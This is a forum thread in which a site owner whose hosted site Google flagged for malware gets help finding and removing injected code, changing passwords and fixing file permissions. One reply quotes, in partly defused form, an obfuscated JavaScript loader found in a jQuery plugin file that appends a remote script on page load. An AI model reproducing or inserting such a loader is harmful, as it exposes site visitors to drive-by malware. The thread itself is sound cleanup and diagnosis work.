My x10 hosted site marked as "distributing malware" by google!

[azamkandy]

From yesterday my site has been reported as a malware distributing site by google! and I reviewed my index.html but I couldn't find anything so I submitted to google again the result was:

Status of the last badware appeal for this site:
A review for this site has finished. The site was found to still be dangerous for users. Please review your site again. When you are confident that you have cleaned and secured your site, please request another review. Sample URLs that were problematic during this review:

Any help much appreciated!

Thanks.

 

[adverlab]

Open your site in google chrome

u will get name of malware sites just remove those from your html

 

[galaxyAbstractor]

I tried visiting your site in IE, and it's downloading a trojan inside a PDF from that bluejacking.ru domain.

The virus resides in the jquery.curvycorners.source.js file, and this file should be immediately be removed.

/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute('type', 'text/javascript');X08yhffhg7xkxf.setAttribute('id', 'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)n&-$@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-)$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^!8&#0$8^!!0#@$/@^#n^$o#&!v@!!i@#@n)k))y!(#.@$c(u@!n$)&t(!.@$!c&$)o$m!&$/$@$w&o)#r)##d(!$!@p)!r@@$e)$s&#s($.@&&c&)))o@&m@(/&#^g^^@(o@o^!g!)l^!e#^#^.)&!c$!o$#&&&m^$#/^(@&'.replace(/\$|&|\!|\)|@|#|\(|\^/ig, ''));X08yhffhg7xkxf.setAttribute('defer', 'defer');document.body.appendChild(X08yhffhg7xkxf);}} catch(e) {}

That code should be removed (I've removed parts of it to break functionality so no script-kiddy would use it)

 

[azamkandy]

Thanks vigge_sWe,

I found the same kind of code in 4 .js files and I removed the code from them ..

And I just wondering how can some one edit that .js file??

 

[Gouri]

And I just wondering how can some one edit that .js file??

What are the permissions set to this .js file.

Check the permissions to all other files too.

 

[galaxyAbstractor]

Thanks vigge_sWe,

I found the same kind of code in 4 .js files and I removed the code from them ..

And I just wondering how can some one edit that .js file??

Did you download them from the same site? If so, there could be a small chance that they already were infected when you downloaded them. Otherwise, they could have known your password, so I suggest you to change it.

 

[azamkandy]

Aw Some stuff I checked everything changed passwords all works fine now
:lockd:hhhmmm....twitter has been hacked by cyber army so no wonder!!!!
Edit:

What are the permissions set to this .js file.

Check the permissions to all other files too.

cheers,

I changed everything to 555 . what is the best you rekn??
and the link to Free google wave invites --> HERE
got two "http://"s in front ...

 

[misson]

I changed everything to 555 . what is the best you rekn??

JS files should be 644, though you could probably use 600. Only directories and scripts that need a shebang line (e.g. CGI scripts) need execute permissions. Scripts handled by Apache (e.g. PHP) or the browser (e.g. JS) aren't executed as commands and don't need shebang lines or execute permissions. Moreover, your virtual site server should run under your user credentials, so you should be able to remove all group and "others" permissions without breaking your site (but test this first).

 

[Gouri]

and the link to Free google wave invites --> HERE
got two "http://"s in front ...

That is the problem with the SMF patch, I will check that and thanks for correction.